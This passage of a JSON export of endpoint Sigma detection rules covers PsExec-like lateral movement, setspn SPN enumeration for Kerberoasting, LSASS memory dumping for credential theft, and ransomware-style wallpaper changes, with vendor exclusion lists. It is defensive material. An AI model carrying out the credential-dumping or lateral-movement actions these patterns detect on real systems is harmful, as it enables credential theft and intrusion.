"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072697Z",
"creation_date": "2026-03-23T11:45:34.072699Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072703Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec",
"https://thedfirreport.com/2022/04/25/quantum-ransomware/",
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1036_execute_psexec.yml",
"content": "title: PsExec-like Process Executed\nid: 6a7426b7-86a4-4009-b5d8-bd78413a67e9\ndescription: |\n Detects the execution of PsExec-like processes, including PsExec itself and similar tools.\n This detection looks for the execution of known PsExec-related executables and their variants, such as psexec.exe, psexec64.exe, winexesvc.exe, and PAExec.\n It also considers the original filenames and parent processes associated with these tools.\n Attackers often use PsExec and similar utilities for lateral movement within a network, leveraging administrative shares.\n This rule helps identify potential unauthorized use of these tools, which could indicate malicious activity.\n Note that legitimate administrative activities may also trigger this detection, so context is important for investigation.\n It is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\n If this activity is recurrent in your environment, it is highly recommended to whitelist the scripts used in your command-line field.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec\n - https://thedfirreport.com/2022/04/25/quantum-ransomware/\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2020/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.defense_evasion\n - attack.t1036\n - attack.persistence\n - attack.t1136.002\n - attack.lateral_movement\n - attack.t1570\n - attack.t1021.002\n - attack.s0029\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.PsExec\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_client:\n - Image|endswith:\n - '\\psexec.exe'\n - '\\psexec64.exe'\n - OriginalFileName:\n - 'psexec.exe'\n - 'psexec.c' # since 2016 versions\n # - 'psexesvc.exe' # PSExec service executable. 
(cannot match on parent process)\n - 'PAExec.exe' # PAExec: https://www.poweradmin.com/paexec/\n\n selection_server:\n - ParentImage|endswith:\n - '\\winexesvc.exe'\n - '\\psexesvc.exe'\n # C:\\Windows\\PAExec-1768-VM-SSI-01.exe / C:\\Windows\\PAExec-2828-S21073.exe ==> \\paexec-PID-hostname.exe\n - '\\PAExec-*-*.exe'\n - ProcessParentOriginalFileName:\n - 'winexesvc.exe'\n - 'psexesvc.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n exclusion_connexionok:\n CommandLine: 'cmd /C echo ConnexionOK'\n\n # https://coservit.com/servicenav/fr/accueil/\n exclusion_servicenav:\n CommandLine|startswith: 'cmd /C echo >NUL | ?:\\WINDOWS\\system32\\windowspowershell\\v1.0\\powershell.exe -command '\n\n exclusion_magellan:\n ParentImage: '?:\\Program Files\\OpenText\\Magellan-*\\integration-center\\GenExec.exe'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a7426b7-86a4-4009-b5d8-bd78413a67e9",
"rule_name": "PsExec-like Process Executed",
"rule_description": "Detects the execution of PsExec-like processes, including PsExec itself and similar tools.\nThis detection looks for the execution of known PsExec-related executables and their variants, such as psexec.exe, psexec64.exe, winexesvc.exe, and PAExec.\nIt also considers the original filenames and parent processes associated with these tools.\nAttackers often use PsExec and similar utilities for lateral movement within a network, leveraging administrative shares.\nThis rule helps identify potential unauthorized use of these tools, which could indicate malicious activity.\nNote that legitimate administrative activities may also trigger this detection, so context is important for investigation.\nIt is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\nIf this activity is recurrent in your environment, it is highly recommended to whitelist the scripts used in your command-line field.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1036",
"attack.t1136.002",
"attack.t1569.002",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a951ef9-9390-4a9a-9757-ee1fe91b679c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093911Z",
"creation_date": "2026-03-23T11:45:34.093913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093918Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md#atomic-test-3---extract-all-accounts-in-use-as-spn-using-setspn",
"https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1558_003_enumerate_spn_via_setspn.yml",
"content": "title: Suspicious SPNs Enumeration via setspn\nid: 6a951ef9-9390-4a9a-9757-ee1fe91b679c\ndescription: |\n Detects the suspicious execution of the legitimate windows tool setspn.\n This tool can be used to extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\n Service Principal Names are used to uniquely identify each instance of a Windows service.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md#atomic-test-3---extract-all-accounts-in-use-as-spn-using-setspn\n - https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2022/08/17\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\setspn.exe'\n - OriginalFileName: 'setspn.exe'\n selection_2:\n CommandLine|contains:\n - '-Q'\n - '/Q'\n\n exclusion_azuread:\n - ParentImage:\n - '?:\\Program Files\\Azure Ad Connect Health Adfs Agent\\Diagnostics\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n - '?:\\Program Files (x86)\\Azure Ad Connect Health Adfs Agent\\Diagnostics\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n - GrandparentImage: '?:\\Program Files\\Microsoft Azure AD Connect Health Agent\\Microsoft.Identity.Health.AgentV??.Service.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Legitimate administrator action\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a951ef9-9390-4a9a-9757-ee1fe91b679c",
"rule_name": "Suspicious SPNs Enumeration via setspn",
"rule_description": "Detects the suspicious execution of the legitimate Windows tool setspn.\nThis tool can be used to extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\nService Principal Names are used to uniquely identify each instance of a Windows service.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ab64fdc-5e5d-466b-acb8-d33de7ac703a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628667Z",
"creation_date": "2026-03-23T11:45:34.628669Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628673Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/",
"https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_minidump.yml",
"content": "title: LSASS Process Memory Dumped via MiniDump API\nid: 6ab64fdc-5e5d-466b-acb8-d33de7ac703a\ndescription: |\n Detects an attempt to open LSASS.exe process memory with read permissions to perform a minidump (using MiniDumpWriteDump located in dbghelp.dll / dbgcore.dll or Minidump located in comsvcs.dll).\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy, to look for the unwanted usage of stolen credentials on others hosts (e.g via Path-the-Hash) as well as to look for other suspicious actions on the host.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/\n - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/02\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n CallTrace|contains:\n - 'dbgcore.dll'\n - 'dbghelp.dll'\n - 'comsvcs.dll'\n\n # This is handled by the rule 3ed4eb53-d0ba-458c-9c03-cd4f967cc00b\n filter_procdump:\n ProcessOriginalFileName: 'procdump'\n\n # taskkill /FI MODULES eq JeepJava.dll\n exclusion_taskkill:\n ProcessInternalName: 'taskkill.exe'\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSigned: 'true'\n 
ProcessCommandLine|contains|all:\n - '/FI '\n - ' MODULES '\n\n # \"C:\\Windows\\system32\\tasklist.exe\" /M LenovoBatteryGaugePackage.dll\n exclusion_tasklist:\n ProcessInternalName: 'tasklist.exe'\n ProcessOriginalFileName: 'tasklist.exe'\n ProcessSigned: 'true'\n ProcessCommandLine|contains: '/M'\n\n exclusion_symantec:\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n CallTrace|contains: 'Symantec Endpoint Protection'\n\n exclusion_werfault1:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\Faultrep.dll'\n - '?:\\Windows\\System32\\WerFault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n ProcessParentImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_werfault2:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\werui.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains:\n - ' -pr Global' # C:\\WINDOWS\\system32\\werfault.exe -pr Global\\AF13DBAAA32678FB\n - ' -p'\n - ' /h /shared Global' # werfault.exe /h /shared Global\\f7f93a4b90f948a58adbbe4165656106 /t 10092 /p 8712\n ProcessParentCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_werfault3:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\SysWOW64\\wer.dll'\n - '?:\\Windows\\SysWOW64\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n\n exclusion_werfault4:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\SysWOW64\\dbgcore.dll'\n - '?:\\Windows\\SysWOW64\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n\n exclusion_werfaultsecure:\n SourceImage: '*\\WerFaultSecure.exe'\n 
CallTrace|contains|all:\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\System32\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessCommandLine|contains: ' -u -p '\n\n exclusion_listdlls_signed:\n ProcessOriginalFileName: 'Listdlls.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_listdlls64_old_sysinternals:\n SourceImage: '*\\Listdlls64.exe'\n GrantedAccess: '0x1fffff'\n ProcessCompany: 'Sysinternals'\n ProcessProduct: 'Sysinternals Listdlls'\n ProcessInternalName: 'Listdlls'\n ProcessOriginalFileName: 'Listdlls.exe'\n\n exclusion_wermgr:\n SourceImage: '*\\wermgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentImage: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_kaspersky:\n SourceImage:\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe'\n - '?:\\Program Files (x86)\\Kaspersky Lab\\KES.*\\avp.exe'\n ProcessSigned: 'true'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_qliktech:\n SourceImage: '?:\\Program Files\\Common Files\\QlikTech\\Custom Data\\QvODBCConnectorPackage\\QvOdbcConnectorPackage.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'QlikTech International AB'\n\n exclusion_smartbear:\n ProcessImage: '?:\\Program Files (x86)\\SmartBear\\TestExecute ??\\x64\\Bin\\TestExecute.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'SmartBear Software Inc'\n - 'SmartBear Software Inc.'\n\n exclusion_sqlserver:\n ProcessImage:\n - '?:\\Program Files\\Microsoft SQL Server\\MSSQL??.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe'\n - '?:\\Program Files\\Microsoft SQL Server Reporting Services\\SSRS\\ReportServer\\bin\\ReportingServicesService.exe'\n - '?:\\Program Files\\Microsoft SQL Server\\\\*\\DTS\\Binn\\DTExec.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n 
CallTrace|contains|all:\n - 'comsvcs.dll'\n - 'orannzsbb1?.dll'\n\n exclusion_oracle_dll_2:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n - 'comsvcs.dll'\n - 'oraociei1?.dll'\n\n exclusion_oracle_dll_3:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n - 'comsvcs.dll'\n - 'OraOLEDB1?.dl'\n\n exclusion_google:\n ProcessImage: '?:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Google LLC'\n CallTrace|contains|all:\n - 'goopdate.dll'\n - 'GoogleUpdate.exe'\n\n exclusion_ninjarmmagent:\n ProcessImage|endswith: '\\NinjaRMMAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'NinjaRMM, LLC'\n - 'NinjaOne LLC'\n CallTrace|contains: 'NinjaRMMAgent.exe'\n\n exclusion_wmi_win32_process_list:\n CallTrace|contains: ':\\Windows\\System32\\framedynos.dll'\n ProcessOriginalFileName: 'Wmiprvse.exe'\n ProcessInternalName: 'Wmiprvse.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n GrantedAccess: '0x1410'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_easyvista:\n GrantedAccess: '0x1410'\n ProcessProduct: 'Easyvista'\n ProcessOriginalFileName: 'SMO_MSSQL.exe'\n CallTrace|contains: '\\bin\\orannzsbb.dll+'\n\n exclusion_mcafee:\n ProcessImage:\n - '?:\\Program Files\\McAfee\\Endpoint Security\\Web Control\\mfewc.exe'\n - '?:\\Program Files (x86)\\McAfee\\Endpoint Security\\Web Control\\mfewc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_rdrleakdiag:\n ProcessImage: '?:\\Windows\\System32\\rdrleakdiag.exe'\n ProcessParentImage: '?:\\Windows\\System32\\taskhostw.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessParentImage: '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\WindowsUpdateBox.exe'\n\n condition: selection and not 1 
of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ab64fdc-5e5d-466b-acb8-d33de7ac703a",
"rule_name": "LSASS Process Memory Dumped via MiniDump API",
"rule_description": "Detects an attempt to open LSASS.exe process memory with read permissions to perform a minidump (using MiniDumpWriteDump located in dbghelp.dll / dbgcore.dll or Minidump located in comsvcs.dll).\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to investigate the process that performed this action to determine its legitimacy, to look for the unwanted usage of stolen credentials on other hosts (e.g. via Pass-the-Hash) as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-06-02",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6abfcbb6-635b-4d06-9f3c-96545e9ac929",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622623Z",
"creation_date": "2026-03-23T11:45:34.622625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622629Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/blog/venus-ransomware-zeoticus-spin-off-shows-sophistication-isnt-necessary-for-success/",
"https://attack.mitre.org/techniques/T1491/001/"
],
"name": "t1491_001_user_wallpaper_modification.yml",
"content": "title: User's Wallpaper Modified\nid: 6abfcbb6-635b-4d06-9f3c-96545e9ac929\ndescription: |\n Detects a modification of the user's desktop wallpaper via a registry modification.\n This technique is often seen during ransomware deployment. An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the organization.\n Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.\n It is recommended to check if this modification is the result of a legitimate action.\nreferences:\n - https://www.sentinelone.com/blog/venus-ransomware-zeoticus-spin-off-shows-sophistication-isnt-necessary-for-success/\n - https://attack.mitre.org/techniques/T1491/001/\ndate: 2024/06/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1491.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Control Panel\\Desktop\\Wallpaper'\n ProcessImage|startswith: '?:\\'\n ProcessParentImage|startswith: '?:\\'\n\n filter_empty:\n Details:\n - '(Empty)'\n - '(None)'\n - '-'\n\n filter_default:\n Details:\n - '?:\\Windows\\web\\wallpaper\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppBackground\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\LocalCache\\Microsoft\\IrisService\\\\*'\n - '?:\\Windows\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\DesktopSpotlight\\Assets\\Images\\\\*'\n\n exclusion_programfiles:\n 
ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_explorer:\n ProcessImage: '?:\\Windows\\Explorer.EXE'\n ProcessParentImage:\n - '?:\\Windows\\system32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\Cliaca2kp.exe'\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n\n exclusion_bginfo1:\n ProcessOriginalFileName:\n - 'BGInfo.exe'\n - 'slui.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n\n exclusion_bgingo2:\n Details:\n - '?:\\Windows\\BGInfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\BGInfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\?\\BGInfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\Themes\\BGInfo.bmp'\n - '?:\\Users\\\\*\\Local Settings\\Application Data\\Sysinternals\\BGInfo\\BGInfo.bmp'\n\n exclusion_qvi:\n ProcessImage: '?:\\Program Files\\QVI\\Portal\\QPWindowService.exe'\n Details: '?:\\Program Files\\QVI\\Portal\\QVIPortalDesktop.jpg'\n\n exclusion_windowsapps1:\n ProcessImage: '?:\\Program Files\\WindowsApps\\\\*'\n Details: 
'?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n exclusion_windowsapps2:\n ProcessGrandparentImage: '?:\\Program Files\\WindowsApps\\\\*'\n Details: '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n\n exclusion_image:\n ProcessImage:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\mighost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe'\n - '?:\\ProgramData\\CentraStage\\AEMAgent\\RMM.WebRemote\\\\*\\RMM.WebRemote.exe'\n - '?:\\Windows\\System32\\Cliaca2kp.exe'\n - '?:\\Windows\\System32\\mspaint.exe'\n\n exclusion_bing:\n ProcessImage: '*\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe'\n Details|startswith: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\'\n\n exclusion_backinfo:\n ProcessOriginalFileName: 'BackInfo.exe'\n ProcessProduct: 'Microsoft BackInfo'\n Details:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\backinfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\backinfo.bmp'\n\n exclusion_raserver:\n ProcessImage: '?:\\Windows\\System32\\msra.exe'\n ProcessAncestors: '?:\\Windows\\System32\\raserver.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_firefox:\n ProcessOriginalFileName: 'firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n Details|contains: '\\AppData\\Roaming\\Mozilla\\Firefox\\'\n\n exclusion_osdsetup:\n ProcessImage: '?:\\Windows\\System32\\OSDSETUPHOOK.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mighost:\n ProcessOriginalFileName: 'MigHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_logmein:\n ProcessOriginalFileName: 'LMI_Rescue.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'LogMeIn, Inc.'\n\n exclusion_transwiz:\n ProcessProduct: 'Transwiz'\n ProcessSigned: 'true'\n ProcessSignature: 'ForensiT Limited'\n\n exclusion_irfanview:\n ProcessOriginalFileName:\n - 
'i_view32.exe'\n - 'i_view64.exe'\n Details:\n - '?:\\Users\\\\*\\AppData\\Roaming\\IrfanView\\IrfanView_Wallpaper.bmp'\n - '?:\\Users\\\\*\\AppData\\Roaming\\IrfanView\\IrfanView_Wallpaper.png'\n\n exclusion_dllhost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}'\n Details: '*\\AppData\\Roaming\\Microsoft\\Windows Photo Viewer\\Papier peint de la Visionneuse de photos Windows.jpg'\n\n exclusion_displayfusion:\n ProcessOriginalFileName: 'DisplayFusionSettings.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Binary Fortress Software Ltd'\n\n exclusion_msra:\n ProcessCommandLine: '?:\\Windows\\System32\\msra.exe -CreateRAConnectionString'\n ProcessParentImage: '?:\\Windows\\System32\\raserver.exe'\n\n exclusion_bingsnap:\n ProcessOriginalFileName: 'BingSnap.exe'\n ProcessCompany: 'Carthago Software'\n\n exclusion_bingdesktop:\n ProcessOriginalFileName: 'BingDesktop.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ec2:\n ProcessCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted Import-Module 